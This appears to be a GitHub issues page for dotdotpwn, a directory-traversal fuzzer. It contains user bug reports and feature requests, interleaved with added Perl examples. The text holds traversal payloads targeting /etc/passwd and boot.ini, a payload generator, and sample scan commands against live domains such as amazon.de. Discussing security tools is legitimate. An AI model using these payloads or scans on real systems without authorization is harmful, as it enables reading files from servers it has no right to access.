wireghoul / dotdotpwn
DotDotPwn - The Directory Traversal Fuzzer
Home Page: http://dotdotpwn.blogspot.com/
License: GNU General Public License v3.0
I would like to add an authorization header to requests in the "http-url" module, somewhat like with curl (curl -H "authorization: Bearer ..."):
dotdotpwn -m http-url -u https://example.com/foo?bar=TRAVERSAL -k "root:" -H "authorization: Bearer ..."
Is this feature in place? If so, I guess it needs to be better documented; otherwise I suggest implementing such a feature.
Hi! First of all, congratulations for the great App.
I would like to report a behavior I believe will help many users. In HTTP_Url.pm, the code dictates that the app should terminate in case of a ping failure:
if(!$ping){
    die "[-] Web server didn't respond !\n";
}
I was testing a windows box where firewall would not allow ping, and modifying the code allowed me to proceed with the test.
While by design, modifying the message to mention 'ping failure' as the cause would narrow down the issue for users.
Continue with your great projects! :)
If I use -x $InsertPortNumberHere, the banner shown before the run says "Port: 443". When I omit the -x option, it displays the default port for the selected module. I've only tested this with the http module so far.
While trying to install dotdotpwn in a Docker image, I noticed the following at run time when executing dotdotpwn:
Cannot open User-Agents.txt file: No such file or directory at /usr/lib/perl5/vendor_perl/DotDotPwn/HTTP_Url.pm
dotdotpwn was installed this way:
cp -r dotdotpwn-3.0.2/DotDotPwn/ /usr/lib/perl5/vendor_perl
cp dotdotpwn-3.0.2/dotdotpwn.pl /usr/bin/dotdotpwn
Libraries are found from /usr/lib/perl5/vendor_perl, no problem, but this specific resource (User-Agents.txt) cannot be found by HTTP_Url.pm even though it is right next to it:
bash-5.0# ls /usr/lib/perl5/vendor_perl/DotDotPwn/
BisectionAlgorithm.pm File.pm HTTP.pm Payload.pm TFTP.pm User-Agents.txt
FTP.pm Fingerprint.pm HTTP_Url.pm STDOUT.pm TraversalEngine.pm
I do not know how relative paths are handled by Perl, but I wondered if my current problem had anything to do with this specific line:
dotdotpwn/DotDotPwn/HTTP_Url.pm
Line 32 in 98760e1
It might sound naive but, from the standpoint of HTTP_Url.pm, isn't User-Agents.txt supposed to be at ./User-Agents.txt instead of DotDotPwn/User-Agents.txt?
I am a complete noob with Perl, so I am open to any cleaner way to install this tool system-wide.
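The report above is the classic "data file opened relative to the current directory" problem: a path like DotDotPwn/User-Agents.txt only resolves when the tool is started from the source checkout. The following is an added example, not dotdotpwn's own code, of resolving the file relative to the module that needs it; the function names (module_dir, data_file_path, load_user_agents) are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example, not dotdotpwn's own code: locate a data file next to the
# module (or script) that uses it, instead of relative to the caller's cwd.
use strict;
use warnings;
use File::Basename qw(dirname);
use File::Spec;

# __FILE__ is the path Perl loaded this file from (e.g. the @INC entry plus
# DotDotPwn/HTTP_Url.pm). Computed once at load time, before any chdir can
# change what a relative path would mean.
my $MODULE_DIR = dirname(File::Spec->rel2abs(__FILE__));

# Directory this file lives in, e.g. /usr/lib/perl5/vendor_perl/DotDotPwn
# after the system-wide copy shown in the report above.
sub module_dir { return $MODULE_DIR }

# Absolute path of a data file that ships next to the module.
sub data_file_path {
    my ($name) = @_;
    return File::Spec->catfile(module_dir(), $name);
}

# Read the non-empty lines of User-Agents.txt. On failure, die with the
# full path so the message says where the file was expected, not just
# "No such file or directory".
sub load_user_agents {
    my $path = data_file_path('User-Agents.txt');
    open(my $fh, '<', $path) or die "Cannot open $path: $!\n";
    my @agents;
    while (my $line = <$fh>) {
        chomp $line;
        push @agents, $line if $line =~ /\S/;
    }
    close $fh;
    return @agents;
}

# The cwd-relative form that fails in the report, for comparison:
#   open(UA, 'DotDotPwn/User-Agents.txt')
# succeeds only when the current directory is the source checkout.
my $path = data_file_path('User-Agents.txt');
if (-e $path) {
    my @agents = load_user_agents();
    printf "%d user agents loaded from %s\n", scalar @agents, $path;
} else {
    print "No data file next to this script; it would be read from $path\n";
}
```

Run from any directory; the resolved path stays the same because it is derived from the location of the file itself, which is the property the install-by-copy into vendor_perl needs.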
How can I give a user:password@host combination for a host that requires basic auth? Alternatively, can I set a header to produce the same result?
Will there be an HTTPS module in the future? It is not supported now.
Does this tool support adding custom cookies and request headers?
Hi,
There seems to be a typo in the help banner:
(use https:// for in url for http-url)
https://github.com/wireghoul/dotdotpwn/blob/master/dotdotpwn.pl#L112
I don't know exactly what the sentence should be, so I am just creating an issue and no pull request.
Hi,
for some scenarios it could be useful to set a single depth or a depth range for the traversal pattern. For example, if we know that the traversal is in this URL:
http://example.com/foo/bar/foo/bar/foo.php?=TRAVERSAL
it doesn't make any sense when testing for /etc/passwd to try traversals like:
http://example.com/foo/bar/foo/bar/foo.php?=../../etc/passwd
The minimum traversal depth should be 4 in this case, which could speed up the testing a lot, as depths 1 to 3 probably won't get any results. Any opinions on this?
I.e., if / has to be encoded as %2f, the traversal should use ..%2f..%2f..%2fetc%2fpasswd, not ..%2f..%2f../etc/passwd.
Currently the http-url and http modules require a pattern passed via the -k parameter, like -k "root:".
It would make sense to use sane defaults for each tested file like:
/etc/passwd -> root:
/etc/hosts -> localhost
boot.ini -> [boot loader]
and just make -k optional, so that people can override the tested pattern.
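The three requests above (a minimum traversal depth, one consistent slash encoding per payload, and a default match pattern per target file) all concern how the payload list is built. The block below is an added example of such a generator, not dotdotpwn's TraversalEngine; the default patterns are the ones proposed in the issue, and the option names (files, min_depth, max_depth, pattern) and the encoding table are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example, not dotdotpwn's own engine: traversal payloads with a depth
# range, one slash encoding used throughout each payload, and a default
# match pattern per target file when no -k value is supplied.
use strict;
use warnings;

# Assumed defaults: what a successful read of each file looks like.
my %DEFAULT_PATTERN = (
    '/etc/passwd' => 'root:',
    '/etc/hosts'  => 'localhost',
    'boot.ini'    => '[boot loader]',
);

# Ways to write "/"; a payload uses exactly one of them throughout.
my %SLASH = (
    plain      => '/',
    url        => '%2f',
    double_url => '%252f',
    utf8_over  => '%c0%af',
);

# "..<sep>" repeated $depth times, then the target file with its own
# separators rewritten with the same $sep, so mixed forms such as
# ..%2f..%2f../etc/passwd are never produced.
sub build_payload {
    my ($depth, $sep, $file) = @_;
    (my $rel = $file) =~ s{^/}{};
    $rel =~ s{/}{$sep}g;
    return join('', ('..' . $sep) x $depth) . $rel;
}

# Returns a list of {payload, depth, enc, file, pattern} hashes.
sub generate {
    my (%opt) = @_;
    my $min = $opt{min_depth} // 1;
    my $max = $opt{max_depth} // 6;
    die "min_depth ($min) must not exceed max_depth ($max)\n" if $min > $max;
    my @tests;
    for my $file (@{ $opt{files} }) {
        my $pattern = $opt{pattern} // $DEFAULT_PATTERN{$file}
            // die "no default pattern for $file; supply one with -k\n";
        for my $enc (sort keys %SLASH) {
            for my $depth ($min .. $max) {
                push @tests, {
                    payload => build_payload($depth, $SLASH{$enc}, $file),
                    depth   => $depth,
                    enc     => $enc,
                    file    => $file,
                    pattern => $pattern,
                };
            }
        }
    }
    return @tests;
}

# The URL in the depth issue sits four directories below the web root, so
# depths 1..3 cannot reach / and are skipped: 24 payloads instead of 48.
my @tests = generate(files => ['/etc/passwd', 'boot.ini'], min_depth => 4, max_depth => 6);
printf "%d payloads (instead of %d with depths 1..6)\n",
    scalar @tests, scalar generate(files => ['/etc/passwd', 'boot.ini']);
printf "%-45s depth=%d enc=%-10s match=%s\n", @{$_}{qw(payload depth enc pattern)}
    for @tests;
```

Backslash variants for Windows targets are left out to keep the table short; they would be a second separator table applied the same way, one encoding per payload.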
Hello!
Could you please help me resolve the issue that I am having when trying to dotdotpwn my website? I downloaded the most recent version of dotdotpwn yesterday to my Kali Linux VM. I have been trying various commands, the latest being:
./dotdotpwn.pl -m http -h all-around-audit-solutions.com -M GET
The response that I keep receiving is:
Web server (all-around-audit-solutions.com) didn't respond !
Could this be because the website is hosted on a GoDaddy server?
Thank you very much for your time and best regards! BTW, I am impressed with your tool as I was able to run it against other domains.
Hi,
I've run dotdotpwn v3.0.2 against a web application, and it has reported 304 traversals.
I ran the following command:
./dotdotpwn.pl -m http -h xxxxxxxx -S -k "root"
All of the vulnerable traversals have a "?" in them, not sure if that is relevant. An example is:
[*] Testing Path (response analysis): https://xxxxxxxxxxx:443/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue <- VULNERABLE!
But when I enter that URL into Chrome it comes back as 403 forbidden.
If it helps the server is running nginx v1.11.3
Thanks for your help!
Is there any option to increase the speed of the tool?
Thanks in advance.
Hi there,
I installed the latest version of dotdotpwn on my Windows machine, and its modules including Net::FTP, TFTP, Time::HiRes, Socket, IO::Socket, Getopt::Std and Switch. When I executed dotdotpwn.pl and pressed Ctrl+C to terminate the test, it told me: Report saved: Reports/TEST_URL_05-28-2016_09-13.txt.
Why can't I find the report folder?
Please help, thanks
The software outputs hundreds of vulnerable URLs, but they are actually redirected to the home page of the website, which is not vulnerable.
Hi there! Great tool!
I try to run it by using:
$ ./dotdotpwn.pl -m http-url -u "http://amazon.de:80/TRAVERSAL" -o unix -k "root:"
...
[+] Report name: Reports/amazon.de_08-27-2014_13-26.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: amazon.de
[+] Setting Operating System type to "unix"
[+] Protocol: http
[+] Port: 80
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 10560
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Replacing "TRAVERSAL" with the traversals created and sending
[+] Fuzz testing finished after 0.02 minutes (1 seconds)
[+] Total Traversals found (so far): 0
[-] Web server didn't respond !
"Web server didn't respond". But the host is obviously online. What am I doing wrong?
Thx in advance,
Victor
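Three reports on this page (the Windows box behind a firewall, the GoDaddy-hosted site, and amazon.de above) end with "Web server didn't respond" for hosts that are clearly serving HTTP, because the liveness check the reporters describe relies on ping, which many hosts drop. The block below is an added example, not dotdotpwn's own check, of testing reachability by a TCP connect to the port the module will actually use; the function names are assumptions for illustration, and the default port follows the URL scheme as the -x banner issue above describes.

```perl
#!/usr/bin/perl
# Added example, not dotdotpwn's own code: decide "is the web server up?"
# with a TCP connect to the target port instead of ICMP ping, and say which
# step failed (DNS, refused, timeout) rather than a generic "didn't respond".
use strict;
use warnings;
use IO::Socket::INET;
use Socket qw(inet_aton inet_ntoa);

# Returns (ok, detail). $@ carries IO::Socket's reason on failure, e.g.
# "connect: Connection refused" or "connect: timeout".
sub tcp_reachable {
    my ($host, $port, $timeout) = @_;
    $timeout //= 5;
    my $packed = inet_aton($host)
        or return (0, "cannot resolve $host");
    my $ip   = inet_ntoa($packed);
    my $sock = IO::Socket::INET->new(
        PeerAddr => $ip,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => $timeout,
    );
    return (0, "connect to $ip:$port failed: " . ($@ || $!)) unless $sock;
    close $sock;
    return (1, "tcp/$port open on $ip ($host)");
}

# Port to test: an explicit -x style value wins, then the port in the URL,
# then 443 for https:// and 80 for http://.
sub port_for_url {
    my ($url, $explicit) = @_;
    return $explicit if defined $explicit;
    my ($scheme, $port) = $url =~ m{^(https?)://[^/:]+(?::(\d+))?}i or return;
    return $port // (lc $scheme eq 'https' ? 443 : 80);
}

# Usage: check.pl http://host/path [port]; defaults to localhost so the
# script runs offline (expect "connect ... refused" when nothing listens).
my ($url, $port_opt) = @ARGV;
$url //= 'http://localhost/';
my ($host) = $url =~ m{^https?://([^/:]+)}i or die "bad URL $url\n";
my $port   = port_for_url($url, $port_opt);
my ($ok, $why) = tcp_reachable($host, $port, 5);
printf "[%s] %s\n", $ok ? '+' : '-', $why;
exit($ok ? 0 : 1);
```

A host that answers on tcp/80 or tcp/443 but drops ICMP passes this check, which is the case in all three reports; a host that resolves but refuses the connection fails with the refusal, which is the message the ping-failure reporter asked for.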
Hey,
There's no flag to use cookies, which makes the tool less useful from my perspective.
It would be nice to have one.
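Several posts on this page ask for the same request-side features (an Authorization header, basic auth, cookies and custom headers) and two describe the same response-side problem: hundreds of "vulnerable" URLs that are really redirects to the home page, and a 403 in the browser for a URL the tool flagged. The block below is an added example, not dotdotpwn's HTTP_Url module, of both halves together using LWP::UserAgent and HTTP::Request, which dotdotpwn's http-url module is built on. The option names headers and basic, the function names, and the sample responses are assumptions constructed for illustration.

```perl
#!/usr/bin/perl
# Added example, not dotdotpwn's own HTTP code. Assumed option names:
# headers => {...} for extra request headers (Bearer token, Cookie) and
# basic => [user, password] for HTTP basic auth. Replies are judged by
# status code and body, and redirects are never followed.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

# Build the GET for one traversal payload, substituting TRAVERSAL in the URL.
sub build_request {
    my ($template, $payload, %opt) = @_;
    (my $url = $template) =~ s/TRAVERSAL/$payload/;
    my $req = HTTP::Request->new(GET => $url);
    my $h = $opt{headers} || {};
    $req->header($_ => $h->{$_}) for sort keys %$h;
    # authorization_basic() writes the Authorization header itself, so it is
    # an alternative to a Bearer token, not something to combine with one.
    $req->authorization_basic(@{ $opt{basic} }) if $opt{basic};
    return $req;
}

# A user agent that hands 3xx responses back instead of following them, so a
# redirect to the home page is seen as a redirect, not as the home page body.
sub make_ua {
    my $ua = LWP::UserAgent->new(timeout => 10, agent => 'Mozilla/5.0');
    $ua->requests_redirectable([]);
    return $ua;
}

# Only a 200 whose body contains $pattern counts as a hit. A 302 to /, a 403
# from a WAF (what the browser showed for the flagged URLs above) and a 200
# home page with an accidental match are each reported under their own label.
sub classify {
    my ($res, $pattern) = @_;
    return 'redirect'  if $res->is_redirect;
    return 'forbidden' if $res->code == 403;
    return 'missing'   if $res->code == 404;
    return 'other'     if $res->code != 200;
    return index($res->content, $pattern) >= 0 ? 'vulnerable' : 'no_match';
}

# Constructed responses so the classifier can be exercised offline.
my @samples = (
    ['302 to home page', HTTP::Response->new(302, 'Found', ['Location' => '/'], '')],
    ['403 from WAF',     HTTP::Response->new(403, 'Forbidden', [], 'blocked')],
    ['200 real passwd',  HTTP::Response->new(200, 'OK', [], "root:x:0:0:root:/root:/bin/bash\n")],
    ['200 home page',    HTTP::Response->new(200, 'OK', [], '<p>Welcome back, root user</p>')],
);

my $req = build_request(
    'https://example.com/foo?bar=TRAVERSAL', '..%2f..%2f..%2f..%2fetc%2fpasswd',
    headers => { Authorization => 'Bearer TOKEN', Cookie => 'session=abc' },
);
print $req->as_string, "\n";

# "root" alone (as in the -k "root" run above) also matches the home page;
# "root:" does not.
for my $pattern ('root:', 'root') {
    printf "-k '%s'  %-16s -> %s\n", $pattern, $_->[0], classify($_->[1], $pattern)
        for @samples;
}

# Live use: pass a URL containing TRAVERSAL on the command line.
if (@ARGV) {
    my $res = make_ua()->request(build_request($ARGV[0], '../../../../etc/passwd'));
    printf "%d %s\n", $res->code, classify($res, 'root:');
}
```

Two design points: requests_redirectable([]) is what turns the "hundreds of vulnerable URLs" into a single 'redirect' label, and matching on the body alone with a pattern that includes the colon ("root:") avoids counting a home page that merely mentions the word root.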
What is the right way to combine multiple keywords to search for in the files? Is it like:
dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:' 'secret' (space between words)
or
dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:', 'secret' ( comma between words)
After installing the Perl module in the Mint distro, it causes the error below:
Can't locate TFTP.pm in @INC (you may need to install the TFTP module) (@INC contains: . /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.
Solution
For the line of code use TFTP; you must put the following line instead, because the module is in 'Net':
use Net::TFTP; # /usr/share/perl5/Net/TFTP.pm
Hello, could you update to Perl v5.14.2?
I get this error:
Can't locate TFTP.pm in @inc (@inc contains: . /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.
BEGIN failed--compilation aborted at DotDotPwn/TFTP.pm line 13.
Compilation failed in require at DotDotPwn/BisectionAlgorithm.pm line 36.
BEGIN failed--compilation aborted at DotDotPwn/BisectionAlgorithm.pm line 36.
Compilation failed in require at DotDotPwn/HTTP.pm line 11.
BEGIN failed--compilation aborted at DotDotPwn/HTTP.pm line 11.
Compilation failed in require at ./dotdotpwn.pl line 59.
BEGIN failed--compilation aborted at ./dotdotpwn.pl line 59.
Net::FTP is up to date (3.08).
TFTP is up to date (1).
Time::HiRes is up to date (1.9739).
Socket is up to date (2.021).
IO::Socket is up to date (1.31).
Getopt::Std is up to date (1.11).
Switch is up to date (2.17).